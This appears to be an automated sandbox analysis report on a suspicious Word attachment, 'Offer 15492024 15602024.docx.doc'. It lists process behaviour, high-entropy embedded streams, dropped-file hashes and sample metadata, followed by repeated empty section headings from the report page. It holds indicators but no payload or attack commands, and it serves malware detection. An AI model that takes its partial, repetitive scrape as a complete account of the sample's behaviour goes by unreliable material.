Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: Offer 15492024 15602024.docx.doc	Stream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980428/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980429/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980430/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980431/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980433/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980434/CONTENTS' entropy: 7.91669502048 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980435/CONTENTS' entropy: 7.91598386737 (max. 8.0)
Source: ~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp.0.dr	Stream path '_1777980436/CONTENTS' entropy: 7.91598386737 (max. 8.0)

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Directory queried: number of queries: 1006

ID:	1446728
Product:	CloudBasic
Start time:	20:40:18
Start date:	23.05.2024
Sample:	Offer 15492024 15602024.docx.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	0d0f500d82551e733eab0fb1060a49da
SHA1:	1e9af5dd484358b007673b0d7f9b85f8ac1a7b6c
SHA256:	d5e214f3096564dfc3e348b6a3ac6aeefed75d785ac7cfab5d3019f67fdbc9be
Filetype:	Word Microsoft Office Open XML Format document (49504/1) 58.23%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG	ASCII text	209CBF08797FA68AE4D8F81E9F150157	07AA41DFA169A1959DCD3F7AD12FB2188D386587	5D11937190DC5A9FCE244C786F0CFD35F389FA535DE85CC361B00B89B595DA9B
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)	ASCII text	209CBF08797FA68AE4D8F81E9F150157	07AA41DFA169A1959DCD3F7AD12FB2188D386587	5D11937190DC5A9FCE244C786F0CFD35F389FA535DE85CC361B00B89B595DA9B
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF510964.TMP (copy)	ASCII text	209CBF08797FA68AE4D8F81E9F150157	07AA41DFA169A1959DCD3F7AD12FB2188D386587	5D11937190DC5A9FCE244C786F0CFD35F389FA535DE85CC361B00B89B595DA9B
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links	data	3B8BF2F369CA7ABDF0636EE15DDEF161	4B82D483B79B555C62AA17F31F24F43C38F2C80F	100201408FDCFA835C8699C6C2FCE748C5C3844C386053F9AA7CAD622373BFCA
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages	SQLite 3.x database, last written using SQLite version 3024000, file counter 15, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 15	0AA5C4A1554B9EFA75AD1D55EAAFD527	053BFF6B01018BCB12B2767BEB359B8CA464543E	1019F443060DB309C3340346FF7CDBD8A6A33D71E11E92D490CC080A83041CFF
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal	SQLite Rollback Journal	CAC047F57FD00A43A6748658DD2659AD	E83C13AE333BA25C813CD3989267F9C9A67493BF	0B8337A4791FD9EC447B90BF6972CB2079EC517565F76E2596676F7FCFEA614A
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin	data	CC471F0BA0AF5790AF5F66770221A6F7	DEF0C722BDBBB15CD1DAE9E533B4A3013D471427	EC9BC4B13AE566FC978B86F5D7ACB28A535CC9DB2812A308A79B48374138F1C1
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)	data	680F359FA02E81BA50C3E8448E96910D	3ADC8B8D9E8AC216FBD9E9EEB1254DD3CD35EEDF	ED49C5509A30F55AB6122B209D618D82A8EB339CB4B70A6D07387B7A428EDAA9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\hNZdz[1].htm	HTML document, ASCII text, with CRLF line terminators	0104C301C5E02BD6148B8703D19B3A73	7436E0B4B1F8C222C38069890B75FA2BAF9CA620	446A6087825FA73EADB045E5A2E9E2ADF7DF241B571228187728191D961DDA1F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2760287.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	476C7C2F309C957F6428D04E94C4F64A	F1B0FA252BABFB7002DC87069A436AD71BDA532F	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4DCE1C90.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	D69C22A341E111FEEA69DF6D8C655D60	AC862337F2EFA43627508927F5052CE694012206	05B2053BF1D070D6034B45CD79B54D80DA3C6D88D016671A345E75048B1A68DB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\642EEADC.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	476C7C2F309C957F6428D04E94C4F64A	F1B0FA252BABFB7002DC87069A436AD71BDA532F	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\988D220B.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	476C7C2F309C957F6428D04E94C4F64A	F1B0FA252BABFB7002DC87069A436AD71BDA532F	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D0EA1B2.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	476C7C2F309C957F6428D04E94C4F64A	F1B0FA252BABFB7002DC87069A436AD71BDA532F	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E522104.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	476C7C2F309C957F6428D04E94C4F64A	F1B0FA252BABFB7002DC87069A436AD71BDA532F	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EEE011E.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	476C7C2F309C957F6428D04E94C4F64A	F1B0FA252BABFB7002DC87069A436AD71BDA532F	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B771952D.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	476C7C2F309C957F6428D04E94C4F64A	F1B0FA252BABFB7002DC87069A436AD71BDA532F	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCE8D351.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	476C7C2F309C957F6428D04E94C4F64A	F1B0FA252BABFB7002DC87069A436AD71BDA532F	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED2C6F4F.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	476C7C2F309C957F6428D04E94C4F64A	F1B0FA252BABFB7002DC87069A436AD71BDA532F	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FCB74535.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	476C7C2F309C957F6428D04E94C4F64A	F1B0FA252BABFB7002DC87069A436AD71BDA532F	C0DA66B866CC999AEE20456C2EEE3EEFC05046B8F5DF3755F95FECB85F9F8BE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{05894FFF-9B10-4445-B3AA-6E03C6331A8D}.tmp	Composite Document File V2 Document, Cannot read section info	4605356C655CA7364D6DD9016DDD5FC3	42B668EDFEC85967742DC5F00A4E38116BA763DE	517CF9F4F50865E40AAD4D5804BF0DF75361F5842875C9B5FDC9A7C75DCC48A8
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{25683BA2-9842-415F-8B16-690542B9D4B9}.tmp	data	69ADAD3B2E8A30194D00F47320939EE3	6CAF57936C807EA0C3A8C1054954EE528B92CEF2	03A6DC2978AA65FADBCB9026B69C8B4F43749FA2DC719AB4AD7489745BAC8D66
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E279F50C-91EA-4841-A527-8D9534FAEB24}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Temp\{566E8198-3E70-454E-BD79-983511A39AB5}	data	B36B61C3586732F8D6A58F047CCD967A	8276A7FA286557CF8A031947B0C6B5ECA3E8FCC9	5FFD4423432F21A01C433B5F5EDA20ED1065F3929CBC69D96815428B5D2650DF
C:\Users\user\AppData\Local\Temp\{D5E9348E-AFB5-4D2F-BD80-A0F3C3BC40FC}	data	680F359FA02E81BA50C3E8448E96910D	3ADC8B8D9E8AC216FBD9E9EEB1254DD3CD35EEDF	ED49C5509A30F55AB6122B209D618D82A8EB339CB4B70A6D07387B7A428EDAA9
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Offer 15492024 15602024.docx.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Thu May 23 17:41:04 2024, length=419998, window=hide	B666B0094DC8DAA10E3352F462959E1D	377B94B69CEDDF6CC0041C6F8C5127D4157FDD3D	BC3DC0677B15AC876BFFCB231FD0B8BDF351B1E832FA171838D8806880BF0E72
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	Generic INItialization configuration [folders]	27720B0EBD8D1A7306EA64D22154D48D	FC9F9D144D8A9F87246C4B20EAB85920FF9D6A23	BF29844CFD0EE81CD982E18219B05C4893A00B3E2223A27DACE34179165C4AE5
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	89AFCB26CA4D4A770472A95DF4A52BA8	C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5	EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
C:\Users\user\Desktop\~$fer 15492024 15602024.docx.doc	data	89AFCB26CA4D4A770472A95DF4A52BA8	C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5	EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17

Windows Analysis Report
Offer 15492024 15602024.docx.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report Offer 15492024 15602024.docx.doc

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
Offer 15492024 15602024.docx.doc